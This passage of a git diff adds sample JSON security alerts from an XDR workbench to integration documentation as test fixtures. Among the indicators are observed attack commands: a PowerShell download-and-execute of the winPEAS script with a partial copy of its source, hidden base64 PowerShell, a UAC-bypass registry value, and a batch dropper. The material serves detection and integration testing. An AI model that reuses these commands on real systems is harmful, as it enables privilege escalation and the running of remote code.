"managementScopeGroupId": "f7566d2b-6522-4f5f-9a92-8e9b72176c8d" + }, + { + "entityType": "host", + "entityValue": { + "guid": "673794B3-E11C-4992-8713-6CC954D64E21", + "name": "COPILOTE-TEST.windows10.local", + "ips": [ + "172.39.11.166" + ] + }, + "entityId": "673794B3-E11C-4992-8713-6CC954D64E21", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "4283bdf5-a191-4df8-bf2e-f6dc17c16ff0" + }, + { + "entityType": "host", + "entityValue": { + "guid": "D62C5057-F860-4B23-9BB9-706C41B08543", + "name": "NEWAC-LB-2K22.windows10.local", + "ips": [ + "fe80::87e9:927d:58dd:d66c%5" + ] + }, + "entityId": "D62C5057-F860-4B23-9BB9-706C41B08543", + "relatedEntities": 
[], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "4283bdf5-a191-4df8-bf2e-f6dc17c16ff0" + }, + { + "entityType": "host", + "entityValue": { + "guid": "6F95CE0D-0F49-4FF1-9413-3B57FC82B680", + "name": "BI4-2K22.windows10.local", + "ips": [ + "96.70.247.104" + ] + }, + "entityId": "6F95CE0D-0F49-4FF1-9413-3B57FC82B680", + "relatedEntities": [], + "relatedIndicatorIds": [ + 1, + 5, + 7 + ], + "provenance": [ + "Sweeping" + ], + "managementScopeGroupId": "4283bdf5-a191-4df8-bf2e-f6dc17c16ff0" + } + ] + }, + "description": "Detects possible unauthorized windows system process modification from a process running in Windows temporary locations", + "matchedRules": [ + { + "id": "34885eaa-08ba-4efc-ae46-70663dba0804", + "name": "Process Injection from Windows Temporary Location to System32", + "matchedFilters": [ + { + "id": "1aeea7bb-9b05-4dff-af2b-30027e53bb15", + "name": "Process Injection To System32 Executable via CMD", + "matchedDateTime": "2024-07-23T07:43:25.945Z", + "mitreTechniqueIds": [ + "T1055.012", + "T1055" + ], + "matchedEvents": [ + { + "uuid": "aa8247f3-ab9f-4af1-bc70-f83ec4943ebb", + "matchedDateTime": "2024-07-23T07:43:25.945Z", + "type": "TELEMETRY_MODIFIED_PROCESS" + } + ] + }, + { + "id": "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb", + "name": "Cross-Process Injection by Process from Temporary Locations", + "matchedDateTime": "2024-07-23T07:43:25.945Z", + "mitreTechniqueIds": [ + "T1055" + ], + "matchedEvents": [ + { + "uuid": "aa8247f3-ab9f-4af1-bc70-f83ec4943ebb", + "matchedDateTime": "2024-07-23T07:43:25.945Z", + "type": "TELEMETRY_MODIFIED_PROCESS" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "command_line", + "field": "objectCmd", + "value": "C:\\WINDOWS\\System32\\gpresult.exe /R", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15", + "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "BACF072C-4180-4F3A-B7E0-3E8984282294", + 
"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7", + "9D6BEFC4-70D3-478A-84AF-A06516E32025", + "D198406E-C84D-4254-8268-F6D02946EFCE", + "4E3230C3-143C-4692-90F6-DA0BEE1A703B", + "0174C373-64D0-40F9-A95F-7F12933B3A4C", + "8F56027B-D321-4914-AD72-B97B2888A414", + "EFC3BA71-F83B-4ED4-B2EA-5068D3D10104", + "673794B3-E11C-4992-8713-6CC954D64E21", + "D62C5057-F860-4B23-9BB9-706C41B08543", + "6F95CE0D-0F49-4FF1-9413-3B57FC82B680" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "command_line", + "field": "parentCmd", + "value": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "command_line", + "field": "processCmd", + "value": "SesProbe-31944.exe ", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "command_line", + "field": "processCmd", + "value": "SesProbe-31944.exe ", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "command_line", + "field": "objectCmd", + "value": "C:\\WINDOWS\\System32\\gpresult.exe /R", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15", + "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "BACF072C-4180-4F3A-B7E0-3E8984282294", + "A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7", + "9D6BEFC4-70D3-478A-84AF-A06516E32025", + "D198406E-C84D-4254-8268-F6D02946EFCE", + 
"4E3230C3-143C-4692-90F6-DA0BEE1A703B", + "0174C373-64D0-40F9-A95F-7F12933B3A4C", + "8F56027B-D321-4914-AD72-B97B2888A414", + "EFC3BA71-F83B-4ED4-B2EA-5068D3D10104", + "673794B3-E11C-4992-8713-6CC954D64E21", + "D62C5057-F860-4B23-9BB9-706C41B08543", + "6F95CE0D-0F49-4FF1-9413-3B57FC82B680" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "command_line", + "field": "parentCmd", + "value": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 7, + "type": "file_sha1", + "field": "processFileHashSha1", + "value": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15", + "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "BACF072C-4180-4F3A-B7E0-3E8984282294", + "A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7", + "9D6BEFC4-70D3-478A-84AF-A06516E32025", + "07C50CDB-F5A9-4368-9035-3173E9580770", + "D198406E-C84D-4254-8268-F6D02946EFCE", + "4E3230C3-143C-4692-90F6-DA0BEE1A703B", + "0174C373-64D0-40F9-A95F-7F12933B3A4C", + "B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77", + "8F56027B-D321-4914-AD72-B97B2888A414", + "EFC3BA71-F83B-4ED4-B2EA-5068D3D10104", + "673794B3-E11C-4992-8713-6CC954D64E21", + "D62C5057-F860-4B23-9BB9-706C41B08543", + "6F95CE0D-0F49-4FF1-9413-3B57FC82B680" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 8, + "type": "file_sha256", + "field": "parentFileHashSha256", + "value": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502", + "relatedEntities": [ + 
"E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 9, + "type": "file_sha256", + "field": "processFileHashSha256", + "value": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 10, + "type": "file_sha256", + "field": "parentFileHashSha256", + "value": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 11, + "type": "file_sha256", + "field": "processFileHashSha256", + "value": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 12, + "type": "fullpath", + "field": "processFilePath", + "value": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 13, + "type": "fullpath", + "field": "parentFilePath", + "value": "C:\\Windows\\System32\\cmd.exe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 14, + "type": "fullpath", + "field": "objectName", + "value": "C:\\Windows\\System32\\gpresult.exe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + 
"id": 15, + "type": "fullpath", + "field": "parentFilePath", + "value": "C:\\Windows\\System32\\cmd.exe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 16, + "type": "fullpath", + "field": "processFilePath", + "value": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 17, + "type": "fullpath", + "field": "objectName", + "value": "C:\\Windows\\System32\\gpresult.exe", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 18, + "type": "host", + "field": "", + "value": { + "guid": "", + "name": "99.255.12.39", + "ips": [ + "99.255.12.39" + ] + }, + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [], + "provenance": [ + "Lateral Movement Enrichment" + ] + }, + { + "id": 19, + "type": "process_id", + "field": "objectPid", + "value": "5552", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [ + "1aeea7bb-9b05-4dff-af2b-30027e53bb15" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 20, + "type": "user_account", + "field": "", + "value": "systel.support", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [], + "provenance": [ + "Related Asset Enrichment" + ] + }, + { + "id": 21, + "type": "user_account", + "field": "", + "value": "srv-serveur", + "relatedEntities": [ + "E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [], + "provenance": [ + "Related Asset Enrichment" + ] + }, + { + "id": 22, + "type": "user_account", + "field": "", + "value": "daqsan.support", + "relatedEntities": [ + 
"E991724A-42D2-44F9-B122-40290A2E9E15" + ], + "filterIds": [], + "provenance": [ + "Related Asset Enrichment" + ] + } + ] + } + ``` + + + +=== "test_registry" + + + ```json + { + "schemaVersion": "1.12", + "id": "WB-9002-20220906-00022", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://THE_WORKBENCH_URL", + "alertProvider": "SAE", + "modelId": "1ebd4f91-4b28-40b4-87f5-8defee4791d8", + "model": "Privilege Escalation via UAC Bypass", + "modelType": "preset", + "score": 64, + "severity": "high", + "firstInvestigatedDateTime": "2022-10-06T02:30:31Z", + "createdDateTime": "2022-09-06T02:49:31Z", + "updatedDateTime": "2022-09-06T02:49:48Z", + "incidentId": "IC-1-20230706-00001", + "caseId": "CL-1-20230706-00001", + "ownerIds": [ + "12345678-1234-1234-1234-123456789012" + ], + "impactScope": { + "desktopCount": 1, + "serverCount": 0, + "accountCount": 1, + "emailAddressCount": 1, + "containerCount": 1, + "cloudIdentityCount": 1, + "entities": [ + { + "entityType": "account", + "entityValue": "shockwave\\sam", + "entityId": "shockwave\\sam", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "name": "nimda", + "ips": [ + "10.10.58.51" + ] + }, + "entityId": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "managementScopeGroupId": "deadbeef-292e-42ae-86be-d2fef483a248", + "managementScopeInstanceId": "1babc299-52de-44f4-a1d2-8a224f391eee", + "managementScopePartitionKey": "4c1850c0-8a2a-4637-9f88-6afbab54dd79", + "relatedEntities": [ + "shockwave\\sam" + ], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6, + 7, + 8 + ], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "emailAddress", + "entityValue": "support@pctutordetroit.com", + "entityId": "SUPPORT@PCTUTORDETROIT.COM", + "relatedEntities": [], + 
"relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "container", + "entityValue": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0", + "entityId": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "relatedEntities": [], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "cloudIdentity", + "entityValue": "arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung", + "entityId": "arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung", + "relatedEntities": [], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + } + ] + }, + "description": "A user bypassed User Account Control (UAC) to gain higher-level permissions.", + "matchedRules": [ + { + "id": "25d96e5d-cb69-4935-ae27-43cc0cdca1cc", + "name": "(T1088) Bypass UAC via shell open registry", + "matchedFilters": [ + { + "id": "ac200e74-8309-463e-ad6b-a4c16a3a377f", + "name": "Bypass UAC Via Shell Open Default Registry", + "matchedDateTime": "2022-09-05T03:53:49.802Z", + "mitreTechniqueIds": [ + "T1112", + "V9.T1112", + "V9.T1548.002" + ], + "matchedEvents": [ + { + "uuid": "a32599b7-c0c9-45ed-97bf-f2be7679fb00", + "matchedDateTime": "2022-09-05T03:53:49.802Z", + "type": "TELEMETRY_REGISTRY" + } + ] + }, + { + "id": "857b6396-da29-44a8-bc11-25298e646795", + "name": "Bypass UAC Via Shell Open Registry", + "matchedDateTime": "2022-09-05T03:53:49.802Z", + "mitreTechniqueIds": [ + "T1112", + "T1088", + "V9.T1112", + "V9.T1548.002" + ], + "matchedEvents": [ + { + "uuid": "4c456bbb-2dfc-40a5-b298-799a0ccefc01", + "matchedDateTime": "2022-09-05T03:53:49.802Z", + "type": "TELEMETRY_REGISTRY" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "command_line", + "field": "processCmd", + "value": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + 
"ac200e74-8309-463e-ad6b-a4c16a3a377f" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "command_line", + "field": "parentCmd", + "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; ", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "ac200e74-8309-463e-ad6b-a4c16a3a377f" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "command_line", + "field": "processCmd", + "value": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "857b6396-da29-44a8-bc11-25298e646795" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "command_line", + "field": "parentCmd", + "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; ", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "857b6396-da29-44a8-bc11-25298e646795" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "registry_key", + "field": "objectRegistryKeyHandle", + "value": "hkcr\\ms-settings\\shell\\open\\command", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "ac200e74-8309-463e-ad6b-a4c16a3a377f" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "registry_key", + "field": "objectRegistryKeyHandle", + "value": "hkcr\\ms-settings\\shell\\open\\command", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "857b6396-da29-44a8-bc11-25298e646795" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 7, + "type": "registry_value", + "field": "objectRegistryValue", + "value": 
"delegateexecute", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "857b6396-da29-44a8-bc11-25298e646795" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 8, + "type": "registry_value_data", + "field": "objectRegistryData", + "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x", + "relatedEntities": [ + "35FA11DA-A24E-40CF-8B56-BAF8828CC15E" + ], + "filterIds": [ + "ac200e74-8309-463e-ad6b-a4c16a3a377f" + ], + "provenance": [ + "Alert" + ] + } + ] + } + ``` + + + +=== "test_service_abuse" + + + ```json + { + "schemaVersion": "1.15", + "id": "WB-11111-22222222-00000", + "investigationStatus": "New", + "status": "Open", + "investigationResult": "No Findings", + "workbenchLink": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000", + "alertProvider": "SAE", + "modelId": "ce2af827-6dfc-4c5b-ab40-ab4b82351c83", + "model": "Possible Web Service Abuse", + "modelType": "preset", + "score": 39, + "severity": "medium", + "createdDateTime": "2024-11-26T16:45:28Z", + "updatedDateTime": "2024-11-26T16:45:28Z", + "ownerIds": [], + "impactScope": { + "desktopCount": 1, + "serverCount": 0, + "accountCount": 1, + "emailAddressCount": 0, + "containerCount": 0, + "cloudIdentityCount": 0, + "entities": [ + { + "entityType": "account", + "entityValue": "windows10\\jdoe", + "entityId": "windows10\\jdoe", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "relatedIndicatorIds": [], + "provenance": [ + "Alert" + ] + }, + { + "entityType": "host", + "entityValue": { + "guid": "e930412e-e09c-454b-a508-576ba266b9d8", + "name": "windows10", + "ips": [ + "20.193.45.33" + ] + }, + "entityId": "e930412e-e09c-454b-a508-576ba266b9d8", + "relatedEntities": [ + "windows10\\jdoe" + ], + "relatedIndicatorIds": [ + 1, + 2, + 3, + 4, + 5, + 6, + 7, + 8, + 9 + 
], + "provenance": [ + "Alert" + ], + "managementScopeGroupId": "ce9c7ad6-f895-4907-bf57-e34b59d4dc90" + } + ] + }, + "description": "The adversary attempted to download a payload stored on a legitimate external web service.", + "matchedRules": [ + { + "id": "ef13e37e-148e-48d6-819f-021f4acfcace", + "name": "Suspicious Powershell Connection To Web Service", + "matchedFilters": [ + { + "id": "97e70752-3b27-4db0-b840-507d3f37ffe6", + "name": "Suspicious Powershell Connection To Web Service - Variant 2", + "matchedDateTime": "2024-11-26T16:42:29.602Z", + "mitreTechniqueIds": [ + "T1102" + ], + "matchedEvents": [ + { + "uuid": "4aed361f-de80-4679-bf18-608b2afe5ff7", + "matchedDateTime": "2024-11-26T16:42:29.602Z", + "type": "TELEMETRY_AMSI" + } + ] + } + ] + } + ], + "indicators": [ + { + "id": 1, + "type": "amsi_rawDataStr", + "field": "objectRawDataStr", + "value": "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 2, + "type": "amsi_rawDataStr", + "field": "objectRawDataStr", + "value": "<#\n.SYNOPSIS\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\n.DESCRIPTION\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\n.EXAMPLE\n # Default - normal operation with username/password audit in drives/registry\n .\\winPeas.ps1\n\n # Include Excel files in search: .xls, .xlsx, .xlsm\n .\\winPeas.ps1 -Excel\n\n # Full audit - normal operation with APIs / Keys / Tokens\n ## This will produce false positives ## \n .\\winPeas.ps1 -FullCheck \n\n # Add Time stamps to each command\n .\\winPeas.ps1 -TimeStamp\n\n.NOTES\n Version: 1.3\n PEASS-ng Original Author: PEASS-ng\n winPEAS.ps1 Author: @RandolphConley\n Creation Date: 10/4/2022\n Website: 
https://github.com/peass-ng/PEASS-ng\n\n TESTED: PoSh 5,7\n UNTESTED: PoSh 3,4\n NOT FULLY COMPATIBLE: PoSh 2 or lower\n#>\n\n######################## FUNCTIONS ########################\n\n[CmdletBinding()]\nparam(\n [switch]$TimeStamp,\n [switch]$FullCheck,\n [switch]$Excel\n)\n\n# Gather KB from all patches installed\nfunction returnHotFixID {\n param(\n [string]$title\n )\n # Match on KB or if patch does not have a KB, return end result\n if (($title | Select-String -AllMatches -Pattern 'KB(\\d{4,6})').Matches.Value) {\n return (($title | Select-String -AllMatches -Pattern 'KB(\\d{4,6})').Matches.Value)\n }\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\d{4,6})').Matches.Value) {\n return (($title | Select-String -NotMatch -Pattern 'KB(\\d{4,6})').Matches.Value)\n }\n}\n\nFunction Start-ACLCheck {\n param(\n $Target, $ServiceName)\n # Gather ACL of object\n if ($null -ne $target) {\n try {\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\n }\n catch { $null }\n \n # If Found, Evaluate Permissions\n if ($ACLObject) { \n $Identity = @()\n $Identity += \"$env:COMPUTERNAME\\$env:USERNAME\"\n if ($ACLObject.Owner -like $Identity ) { Write-Host \"$Identity has ownership of $Target\" -ForegroundColor Red }\n # This should now work for any language. 
Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \"group name\" to the first column.\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\n $IdentityFound = $false\n foreach ($i in $Identity) {\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\n $UserPermission = \"\"\n switch -WildCard ($Permission.FileSystemRights) {\n \"FullControl\" { $userPermission = \"FullControl\"; $IdentityFound = $true }\n \"Write*\" { $userPermission = \"Write\"; $IdentityFound = $true }\n \"Modify\" { $userPermission = \"Modify\"; $IdentityFound = $true }\n }\n Switch ($permission.RegistryRights) {\n \"FullControl\" { $userPermission = \"FullControl\"; $IdentityFound = $true }\n }\n if ($UserPermission) {\n if ($ServiceName) { Write-Host \"$ServiceName found with permissions issue:\" -ForegroundColor Red }\n Write-Host -ForegroundColor red \"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\"\n }\n } \n # Identity Found Check - If False, loop through and stop at root of drive\n if ($IdentityFound -eq $false) {\n if ($Target.Length -gt 3) {\n $Target = Split-Path $Target\n Start-ACLCheck $Target -ServiceName $ServiceName\n }\n }\n }\n else {\n # If not found, split path one level and Check again\n $Target = Split-Path $Target\n Start-ACLCheck $Target $ServiceName\n }\n }\n}\n\nFunction UnquotedServicePathCheck {\n Write-Host \"Fetching the list of services, this may take a while...\";\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \"`\"\" -and $_.PathName -inotmatch \":\\\\Windows\\\\\" -and ($_.StartMode -eq \"Auto\" -or $_.StartMode -eq \"Manual\") -and ($_.State -eq \"Running\" -or $_.State -eq \"Stopped\") };\n if ($($services | Measure-Object).Count -lt 1) {\n Write-Host \"No unquoted service paths were 
found\";\n }\n else {\n $services | ForEach-Object {\n Write-Host \"Unquoted Service Path found!\" -ForegroundColor red\n Write-Host Name: $_.Name\n Write-Host PathName: $_.PathName\n Write-Host StartName: $_.StartName \n Write-Host StartMode: $_.StartMode\n Write-Host Running: $_.State\n } \n }\n}\n\nfunction TimeElapsed { Write-Host \"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\" }\nFunction Get-ClipBoardText {\n Add-Type -AssemblyName PresentationCore\n $text = [Windows.Clipboard]::GetText()\n if ($text) {\n Write-Host \"\"\n if ($TimeStamp) { TimeElapsed }\n Write-Host -ForegroundColor Blue \"=========|| ClipBoard text found:\"\n Write-Host $text\n \n }\n}\n\nFunction Search-Excel {\n [cmdletbinding()]\n Param (\n [parameter(Mandatory, ValueFromPipeline)]\n [ValidateScript({\n Try {\n If (Test-Path -Path $_) {$True}\n ", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 3, + "type": "command_line", + "field": "processCmd", + "value": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 4, + "type": "command_line", + "field": "parentCmd", + "value": "C:\\Windows\\Explorer.EXE", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 5, + "type": "file_sha256", + "field": "processFileHashSha256", + "value": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 6, + "type": "fullpath", + 
"field": "processFilePath", + "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 7, + "type": "process_id", + "field": "processPid", + "value": "5040", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 8, + "type": "process_id", + "field": "parentPid", + "value": "9920", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + }, + { + "id": 9, + "type": "text", + "field": "endpointHostName", + "value": "Windows10", + "relatedEntities": [ + "e930412e-e09c-454b-a508-576ba266b9d8" + ], + "filterIds": [ + "97e70752-3b27-4db0-b840-507d3f37ffe6" + ], + "provenance": [ + "Alert" + ] + } + ] + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md b/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md index 